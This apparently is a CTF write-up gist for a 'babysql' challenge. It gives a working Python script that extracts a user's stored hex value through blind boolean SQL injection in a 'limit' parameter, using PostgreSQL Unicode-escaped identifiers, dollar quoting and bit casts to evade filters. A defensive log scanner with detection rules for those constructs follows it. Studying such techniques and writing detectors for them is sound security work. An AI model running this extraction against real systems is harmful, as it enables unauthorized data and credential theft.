@shpik-kr
Created September 15, 2019 01:27
babysql writeup
```python
import requests
import urllib.parse
import json

# Challenge endpoint; the injection point is the `limit` query parameter.
url = lambda x: "http://mashiro.kr:13000/search?limit=%s" % urllib.parse.quote(x)

cnt = 0   # number of HTTP requests issued
pw = ''   # recovered value, one hex digit per outer iteration

# 32 hex characters are recovered, 4 bits each.
for i in range(1, 33):
    tmp = 0
    # The i-th character is prefixed with 'x' and cast to bit(4), which
    # PostgreSQL parses as a hex bit string, so each character yields four
    # bits that are tested one at a time.
    for offset in range(1, 5):
        cnt += 1
        # Identifiers are written as Unicode escapes (U&"\0070\0077" is "pw",
        # U&"\0069\0064" is "id") and strings are dollar-quoted ($$...$$),
        # so the request contains no quote characters or plain column names.
        query = '(select 0 where (select b from (select substr((select concat($$x$$,substr(U&"\\0070\\0077",%d,1)::char)::bit(4))::text,%d,1) as b,ip from users where U&"\\0069\\0064" like $$mashiro$$) as a where a.ip like $$%%111.101.197.149%%$$)=$$0$$)' % (i, offset)
        r = requests.get(url(query))
        output = json.loads(r.text)
        if 'items' in output.keys():
            # Bit is '0': the subquery yields 0 and LIMIT 0 returns no items.
            # Bit is '1': the subquery yields NULL, LIMIT NULL imposes no
            # limit, and items come back, so a non-empty result sets the bit.
            if len(output['items']):
                tmp += 1 << (4 - offset)
        else:
            print(output)
            print('Error Occurred!')
            exit(0)
    pw += hex(tmp).replace('0x', '')
    print(pw)

print('total count :', cnt)
print(pw)
```
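From the defender's side, the same constructs that let this payload through a naive filter (Unicode-escaped identifiers, dollar-quoted strings, a `::bit(4)` cast, and a subselect in a parameter that should only ever be an integer) are easy to spot in access logs once the query string is percent-decoded. The script below is an added example, not part of the gist: it parses constructed web-server log lines (the sample lines, the `NUMERIC_PARAMS` set and the rule names are my own assumptions, not anything from the challenge) and reports which rules each request triggers.

```python
import re
import urllib.parse

# Pattern for the request line inside a common-log-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Each rule is applied to the percent-decoded parameter value.
EVASION_RULES = [
    # U&"\0070\0077" spells an identifier without writing its letters.
    ("pg_unicode_escape_ident", re.compile(r'U&"', re.I)),
    # $$...$$ or $tag$...$tag$ is a string literal with no quote character.
    ("pg_dollar_quote", re.compile(r'\$[A-Za-z_]*\$')),
    # ::bit(n) turns a character into individually testable bits.
    ("pg_bit_cast", re.compile(r'::\s*bit\s*\(', re.I)),
    ("subselect", re.compile(r'\bselect\b', re.I)),
]

# Parameters that must be plain integers in this (assumed) application.
NUMERIC_PARAMS = {"limit", "offset", "page"}


def inspect_request(path: str) -> list[dict]:
    """Return one finding per query parameter that trips at least one rule."""
    parsed = urllib.parse.urlsplit(path)
    findings = []
    # parse_qsl percent-decodes each value once, which is what the DB saw.
    for name, value in urllib.parse.parse_qsl(parsed.query, keep_blank_values=True):
        hits = [rule for rule, rx in EVASION_RULES if rx.search(value)]
        if name in NUMERIC_PARAMS and not value.strip().lstrip('-').isdigit():
            hits.append("non_numeric_in_numeric_param")
        if hits:
            findings.append({"param": name, "value": value, "rules": hits})
    return findings


def scan_log(text: str) -> list[dict]:
    """Scan every request line in a log and return the alerts with line numbers."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for finding in inspect_request(m.group(1)):
            alerts.append({"line": lineno, **finding})
    return alerts


def _log_line(ip, ts, path, status, size):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} {size}'


# Constructed sample log: two requests carrying the kinds of value the script
# above sends (shortened), followed by two benign requests.
_q = urllib.parse.quote
SAMPLE_LOG = "\n".join([
    _log_line("10.0.0.5", "15/Sep/2019:01:27:11 +0000",
              "/search?limit=" + _q('(select 0 where U&"\\0070\\0077" like $$m$$)'), 200, 17),
    _log_line("10.0.0.5", "15/Sep/2019:01:27:12 +0000",
              "/search?limit=" + _q('(select substr(($$x5$$)::bit(4)::text,1,1))'), 200, 17),
    _log_line("10.0.0.9", "15/Sep/2019:01:30:00 +0000", "/search?limit=10", 200, 512),
    _log_line("10.0.0.9", "15/Sep/2019:01:30:02 +0000",
              "/search?limit=25&q=" + _q("password reset"), 200, 900),
])

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"line {alert['line']}: {alert['param']}={alert['value']!r} -> {', '.join(alert['rules'])}")
```

The `non_numeric_in_numeric_param` rule is the one that matters most here: whatever encoding tricks the value uses, a `limit` that is not an integer is wrong, and rejecting it server-side (or binding it as an integer parameter) closes the injection regardless of the other patterns. The regex rules exist to attribute the attempt, not to be the primary control.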